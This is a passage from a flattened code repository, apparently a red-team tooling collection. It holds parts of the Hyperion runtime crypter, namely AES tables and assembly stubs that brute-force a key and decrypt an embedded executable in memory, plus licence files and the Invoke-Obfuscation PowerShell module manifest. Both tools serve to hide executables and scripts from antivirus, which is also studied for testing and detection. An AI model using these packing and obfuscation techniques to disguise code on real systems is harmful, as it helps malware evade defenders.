67 | * Figure out how much room is needed...
68 | */
69 |
70 | size--;
71 |
72 | srclen = strlen(src);
73 |
74 | /*
75 | * Copy the appropriate amount...
76 | */
77 |
78 | if (srclen > size)
79 | srclen = size;
80 |
81 | memcpy(dst, src, srclen);
82 | dst[srclen] = '\0';
83 |
84 | return (srclen);
85 | }
86 | #endif /* !HAVE_STRLCPY */
87 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/secure_string.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Src/Crypter/secure_string.o
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/verbose.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | #include "hyperion.h"
5 |
6 | BOOL display_verbose = FALSE;
7 |
8 | void verbose(const char *format, ...)
9 | {
10 | va_list args;
11 | if (!display_verbose)
12 | return;
13 |
14 | va_start(args, format);
15 | vprintf(format, args);
16 | va_end(args);
17 | }
18 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Crypter/verbose.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Src/Crypter/verbose.o
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/32/aes.inc:
--------------------------------------------------------------------------------
1 | ;select an AES mode
2 | AES128 equ 1
3 | ;AES192 equ 1
4 | ;AES256 equ 1
5 |
6 | ;internal constants, don't change them
7 | include 'aes_constants_intern.inc'
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/32/aes_constants_intern.inc:
--------------------------------------------------------------------------------
1 | ;static for AES
2 | BLOCK_SIZE equ 16
3 | COLUMN_SIZE equ 4
4 |
5 | if defined AES128
6 | KEY_SIZE = 16
7 | EXTENDED_KEY_SIZE = 176
8 | ROW_SIZE = 4
9 | ENCRYPTION_ROUNDS = 10
10 | end if
11 |
12 | if defined AES192
13 | KEY_SIZE = 24
14 | EXTENDED_KEY_SIZE = 208
15 | ROW_SIZE = 6
16 | ENCRYPTION_ROUNDS = 12
17 | end if
18 |
19 | if defined AES256
20 | KEY_SIZE = 32
21 | EXTENDED_KEY_SIZE = 240
22 | ROW_SIZE = 8
23 | ENCRYPTION_ROUNDS = 14
24 | end if
25 |
26 | ;size of the sbox
27 | SBOX_SIZE equ 256
28 |
29 | ;size of the rcon table
30 | RCON_SIZE equ 256
31 |
32 | ;size of the Galois multiplication
33 | ;lookup tables
34 | GALOIS_SIZE equ 256
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/32/decryptexecutable.asm:
--------------------------------------------------------------------------------
1 | ;Decrypt the exe which is stored in input_image
2 | proc decryptExecutable stdcall APITable:DWORD, input_image:DWORD
3 |
4 | local str1[256]:BYTE, ret_val:DWORD,\
5 | key[KEY_SIZE]:BYTE, encrypted_backup:DWORD
6 |
7 | pushad
8 | writeWithNewLine createStringBruteforcing, str1, dec_exit_success
9 |
10 | ;init key
11 | lea edi,[key]
12 | mov ecx, KEY_SIZE
13 | mov al,0
14 | dec_init_key:
15 | mov [edi],al
16 | inc edi
17 | dec ecx
18 | jnz dec_init_key
19 |
20 | ;create a copy of the encrypted file
21 | ;which is used to brute force the key
22 | mov eax,[APITable]
23 | stdcall dword [eax+VirtualAlloc], 0, INFILE_SIZE, MEM_COMMIT+MEM_RESERVE, PAGE_READWRITE
24 | test eax, eax
25 | jz dec_exit_error
26 | mov [encrypted_backup],eax
27 | ;now copy the file into the buffer
28 | mov edi,eax
29 | mov esi,[input_image]
30 | mov ecx,INFILE_SIZE
31 | ;we can mov dwords because buffer is a multiple of 16
32 | shr ecx,2
33 | repz movsd
34 |
35 | keyspace_loop:
36 | lea eax,[key]
37 | stdcall decAES, INFILE_SIZE, [input_image], [input_image], eax
38 | stdcall verifyChecksum, [input_image], INFILE_SIZE
39 | test eax,eax
40 | jnz dec_decrypted_success
41 |
42 | ;restore the encrypted version to try the next key
43 | mov esi,[encrypted_backup]
44 | mov edi,[input_image]
45 | mov ecx,INFILE_SIZE
46 | shr ecx,2
47 | repz movsd
48 | ;lea eax,[key]
49 | ;stdcall encAES, [section_size], [section_address], [section_address], eax
50 |
51 | ;next key
52 | lea eax,[key]
53 | stdcall nextKey, eax
54 | test eax,eax
55 | jz dec_exit_error
56 | ;abort if key space was explored, else continue
57 | jmp keyspace_loop
58 |
59 | dec_decrypted_success:
60 | mov eax,[APITable]
61 | stdcall dword [eax+VirtualFree], [encrypted_backup], 0, MEM_RELEASE
62 | test eax, eax
63 | jz dec_exit_error
64 |
65 | dec_exit_success:
66 | popad
67 | mov eax,1
68 | ret
69 |
70 | dec_exit_error:
71 | popad
72 | sub eax,eax
73 | ret
74 |
75 | endp
76 |
77 | ;generate next decryption key
78 | proc nextKey stdcall key_ptr:DWORD
79 |
80 | push ebx
81 | mov eax,[key_ptr]
82 | mov ebx,eax
83 | add ebx,REAL_KEY_SIZE
84 | nkey_next_element:
85 | inc byte [eax]
86 | cmp byte [eax],REAL_KEY_RANGE
87 | jne nkey_not_finished
88 | mov byte [eax],0
89 | inc eax
90 | cmp eax,ebx
91 | je nkey_finished
92 | jmp nkey_next_element
93 |
94 | nkey_not_finished:
95 | pop ebx
96 | mov eax,1
97 | ret
98 |
99 | nkey_finished:
100 | pop ebx
101 | sub eax,eax
102 | ret
103 |
104 | endp;
105 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/32/license.txt:
--------------------------------------------------------------------------------
1 | Copyright (c) 2019, FasmAES by Christian Ammann
2 | All rights reserved.
3 |
4 | Redistribution and use in source and binary forms, with or without
5 | modification, are permitted provided that the following conditions are met:
6 |
7 | 1. Redistributions of source code must retain the above copyright notice, this
8 | list of conditions and the following disclaimer.
9 | 2. Redistributions in binary form must reproduce the above copyright notice,
10 | this list of conditions and the following disclaimer in the documentation
11 | and/or other materials provided with the distribution.
12 |
13 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
14 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
15 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
16 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
17 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
18 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
19 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
20 | ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
21 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
22 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
23 |
24 | The views and conclusions contained in the software and documentation are those
25 | of the authors and should not be interpreted as representing official policies,
26 | either expressed or implied, of the Nullsecurity Project.
27 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/32/rcon.asm:
--------------------------------------------------------------------------------
1 | macro CreateRcon target, [char]
2 | {
3 | mov byte [target], char
4 | inc target
5 | }
6 |
7 | ;dynamically generate the rcon in memory
8 | ;uses hard coded values, no algorithm
9 | proc createRcon rcon_ptr:DWORD
10 | push eax
11 | mov eax, [rcon_ptr]
12 | CreateRcon eax, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a,\
13 | 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39,\
14 | 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a,\
15 | 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8,\
16 | 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef,\
17 | 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc,\
18 | 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b,\
19 | 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3,\
20 | 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94,\
21 | 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20,\
22 | 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35,\
23 | 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f,\
24 | 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04,\
25 | 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63,\
26 | 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd,\
27 | 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d
28 | pop eax
29 | ret
30 | endp
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/64/aes.inc:
--------------------------------------------------------------------------------
1 | ;select an AES mode
2 | AES128 equ 1
3 | ;AES192 equ 1
4 | ;AES256 equ 1
5 |
6 | ;internal constants, don't change them
7 | include 'aes_constants_intern.inc'
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/64/aes_constants_intern.inc:
--------------------------------------------------------------------------------
1 | ;static for AES
2 | BLOCK_SIZE equ 16
3 | COLUMN_SIZE equ 4
4 |
5 | if defined AES128
6 | KEY_SIZE = 16
7 | EXTENDED_KEY_SIZE = 176
8 | ROW_SIZE = 4
9 | ENCRYPTION_ROUNDS = 10
10 | end if
11 |
12 | if defined AES192
13 | KEY_SIZE = 24
14 | EXTENDED_KEY_SIZE = 208
15 | ROW_SIZE = 6
16 | ENCRYPTION_ROUNDS = 12
17 | end if
18 |
19 | if defined AES256
20 | KEY_SIZE = 32
21 | EXTENDED_KEY_SIZE = 240
22 | ROW_SIZE = 8
23 | ENCRYPTION_ROUNDS = 14
24 | end if
25 |
26 | ;size of the sbox
27 | SBOX_SIZE equ 256
28 |
29 | ;size of the rcon table
30 | RCON_SIZE equ 256
31 |
32 | ;size of the Galois multiplication
33 | ;lookup tables
34 | GALOIS_SIZE equ 256
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/64/decryptexecutable.asm:
--------------------------------------------------------------------------------
1 | ;Decrypt the exe which is stored in input_image
2 | proc decryptExecutable uses rsi rdi, input_image:QWORD
3 |
4 | local str1[256]:BYTE, ret_val:QWORD,\
5 | key[KEY_SIZE]:BYTE, encrypted_backup:QWORD
6 |
7 | mov [input_image],rcx
8 |
9 | writeWithNewLine createStringBruteforcing, str1, dec_exit_success
10 | ;init key
11 | lea rdi,[key]
12 | mov rcx, KEY_SIZE
13 | mov al,0
14 | dec_init_key:
15 | mov [rdi],al
16 | inc rdi
17 | dec rcx
18 | jnz dec_init_key
19 |
20 | ;create a copy of the encrypted file
21 | ;which is used to brute force the key
22 | invoke VirtualAlloc, 0, INFILE_SIZE, MEM_COMMIT+MEM_RESERVE, PAGE_READWRITE
23 | test rax, rax
24 | jz dec_exit_error
25 | mov [encrypted_backup],rax
26 | ;now copy the file into the buffer
27 | mov rdi,rax
28 | mov rsi,[input_image]
29 | mov rcx,INFILE_SIZE
30 | ;we can mov qwords because buffer is a multiple of 16
31 | shr rcx,3
32 | repz movsq
33 |
34 | keyspace_loop:
35 | lea rax,[key]
36 | fastcall decAES, INFILE_SIZE, [input_image], [input_image], rax
37 | fastcall verifyChecksum, [input_image], INFILE_SIZE
38 | test rax,rax
39 | jnz dec_decrypted_success
40 |
41 | ;restore the encrypted version to try the next key
42 | mov rsi,[encrypted_backup]
43 | mov rdi,[input_image]
44 | mov rcx,INFILE_SIZE
45 | shr rcx,3
46 | repz movsq
47 | ;lea eax,[key]
48 | ;stdcall encAES, [section_size], [section_address], [section_address], eax
49 |
50 | ;next key
51 | lea rax,[key]
52 | fastcall nextKey, rax
53 | test rax,rax
54 | jz dec_exit_error
55 | ;abort if key space was explored, else continue
56 | jmp keyspace_loop
57 |
58 | dec_decrypted_success:
59 | invoke VirtualFree, [encrypted_backup], 0, MEM_RELEASE
60 | test rax, rax
61 | jz dec_exit_error
62 |
63 | dec_exit_success:
64 | mov rax,1
65 | jmp dec_exit_ret
66 |
67 | dec_exit_error:
68 | sub rax,rax
69 |
70 | dec_exit_ret:
71 | ret
72 |
73 | endp
74 |
75 | ;generate next decryption key
76 | proc nextKey key_ptr:QWORD
77 |
78 | mov [key_ptr],rcx
79 |
80 | mov rax,[key_ptr]
81 | mov r10,rax
82 | add r10,REAL_KEY_SIZE
83 | nkey_next_element:
84 | inc byte [rax]
85 | cmp byte [rax],REAL_KEY_RANGE
86 | jne nkey_not_finished
87 | mov byte [rax],0
88 | inc rax
89 | cmp rax,r10
90 | je nkey_finished
91 | jmp nkey_next_element
92 |
93 | nkey_not_finished:
94 | mov rax,1
95 | ret
96 |
97 | nkey_finished:
98 | sub rax,rax
99 | ret
100 |
101 | endp;
102 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/64/license.txt:
--------------------------------------------------------------------------------
1 | Copyright (c) 2019, FasmAES by Christian Ammann
2 | All rights reserved.
3 |
4 | Redistribution and use in source and binary forms, with or without
5 | modification, are permitted provided that the following conditions are met:
6 |
7 | 1. Redistributions of source code must retain the above copyright notice, this
8 | list of conditions and the following disclaimer.
9 | 2. Redistributions in binary form must reproduce the above copyright notice,
10 | this list of conditions and the following disclaimer in the documentation
11 | and/or other materials provided with the distribution.
12 |
13 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
14 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
15 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
16 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
17 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
18 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
19 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
20 | ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
21 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
22 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
23 |
24 | The views and conclusions contained in the software and documentation are those
25 | of the authors and should not be interpreted as representing official policies,
26 | either expressed or implied, of the Nullsecurity Project.
27 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/64/rcon.asm:
--------------------------------------------------------------------------------
1 | ;loads the rcon into memory. idea behind this implementation:
2 | ;add garbage code, split up array into sub-arrays, reverse order, etc.
3 | ;to hide rcon where its neccessary
4 | proc createRcon uses rsi rdi, rcon_ptr:QWORD
5 | mov [rcon_ptr],rcx
6 |
7 | mov rdi,[rcon_ptr]
8 | mov rsi,rcon_array
9 | mov rcx,RCON_SIZE
10 | repz movsb
11 | ret
12 |
13 | rcon_array db 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a,\
14 | 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39,\
15 | 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a,\
16 | 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8,\
17 | 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef,\
18 | 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc,\
19 | 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b,\
20 | 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3,\
21 | 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94,\
22 | 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20,\
23 | 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35,\
24 | 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f,\
25 | 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04,\
26 | 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63,\
27 | 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd,\
28 | 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d
29 |
30 | endp
31 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/c/aes.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Src/Payloads/Aes/c/aes.o
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Payloads/Aes/c/unlicense.txt:
--------------------------------------------------------------------------------
1 | This is free and unencumbered software released into the public domain.
2 |
3 | Anyone is free to copy, modify, publish, use, compile, sell, or
4 | distribute this software, either in source code form or as a compiled
5 | binary, for any purpose, commercial or non-commercial, and by any
6 | means.
7 |
8 | In jurisdictions that recognize copyright laws, the author or authors
9 | of this software dedicate any and all copyright interest in the
10 | software to the public domain. We make this dedication for the benefit
11 | of the public at large and to the detriment of our heirs and
12 | successors. We intend this dedication to be an overt act of
13 | relinquishment in perpetuity of all present and future rights to this
14 | software under copyright law.
15 |
16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
17 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
18 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
19 | IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
20 | OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
21 | ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
22 | OTHER DEALINGS IN THE SOFTWARE.
23 |
24 | For more information, please refer to
25 |
--------------------------------------------------------------------------------
/contrib/Hyperion/hyperion.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/hyperion.exe
--------------------------------------------------------------------------------
/contrib/Hyperion/license.txt:
--------------------------------------------------------------------------------
1 | Copyright (c) 2020, Hyperion Runtime Crypter by Christian Ammann
2 | All rights reserved.
3 |
4 | Redistribution and use in source and binary forms, with or without
5 | modification, are permitted provided that the following conditions are met:
6 |
7 | 1. Redistributions of source code must retain the above copyright notice, this
8 | list of conditions and the following disclaimer.
9 | 2. Redistributions in binary form must reproduce the above copyright notice,
10 | this list of conditions and the following disclaimer in the documentation
11 | and/or other materials provided with the distribution.
12 |
13 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
14 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
15 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
16 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
17 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
18 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
19 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
20 | ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
21 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
22 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
23 |
24 | The views and conclusions contained in the software and documentation are those
25 | of the authors and should not be interpreted as representing official policies,
26 | either expressed or implied, of the Nullsecurity Project.
27 |
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Invoke-Obfuscation.psd1:
--------------------------------------------------------------------------------
1 | # This file is part of Invoke-Obfuscation.
2 | #
3 | # Copyright 2017 Daniel Bohannon <@danielhbohannon>
4 | # while at Mandiant
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 |
18 |
19 |
20 | #
21 | # Module manifest for module 'Invoke-Obfuscation'
22 | #
23 | # Generated by: Daniel Bohannon (@danielhbohannon)
24 | #
25 | # Generated on: 2017-01-19
26 | #
27 |
28 |
29 |
30 | @{
31 |
32 | # Version number of this module.
33 | ModuleVersion = '1.1'
34 |
35 | # ID used to uniquely identify this module
36 | GUID = 'd0a9150d-b6a4-4b17-a325-e3a24fed0aa9'
37 |
38 | # Author of this module
39 | Author = 'Daniel Bohannon (@danielhbohannon)'
40 |
41 | # Copyright statement for this module
42 | Copyright = 'Apache License, Version 2.0'
43 |
44 | # Description of the functionality provided by this module
45 | Description = 'PowerShell module file for importing all required modules for the Invoke-Obfuscation framework.'
46 |
47 | # Minimum version of the Windows PowerShell engine required by this module
48 | PowerShellVersion = '2.0'
49 |
50 | # Minimum version of the Windows PowerShell host required by this module
51 | PowerShellHostVersion = '2.0'
52 |
53 | # Script files (.ps1) that are run in the caller's environment prior to importing this module
54 | ScriptsToProcess = @('Out-ObfuscatedTokenCommand.ps1','Out-ObfuscatedAst.ps1','Out-ObfuscatedStringCommand.ps1','Out-EncodedAsciiCommand.ps1','Out-EncodedHexCommand.ps1','Out-EncodedOctalCommand.ps1','Out-EncodedBinaryCommand.ps1','Out-SecureStringCommand.ps1','Out-EncodedBXORCommand.ps1','Out-EncodedSpecialCharOnlyCommand.ps1','Out-EncodedWhitespaceCommand.ps1','Out-CompressedCommand.ps1','Out-PowerShellLauncher.ps1','Invoke-Obfuscation.ps1')
55 |
56 | # Functions to export from this module
57 | FunctionsToExport = '*'
58 |
59 | # HelpInfo URI of this module
60 | # HelpInfoURI = ''
61 |
62 | }
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-CompressedCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-CompressedCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-EncodedAsciiCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-EncodedAsciiCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-EncodedBXORCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-EncodedBXORCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-EncodedBinaryCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-EncodedBinaryCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-EncodedHexCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-EncodedHexCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-EncodedOctalCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-EncodedOctalCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-EncodedSpecialCharOnlyCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-EncodedSpecialCharOnlyCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-EncodedWhitespaceCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-EncodedWhitespaceCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-ObfuscatedStringCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-ObfuscatedStringCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-ObfuscatedTokenCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-ObfuscatedTokenCommand.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-PowerShellLauncher.ps1:
--------------------------------------------------------------------------------
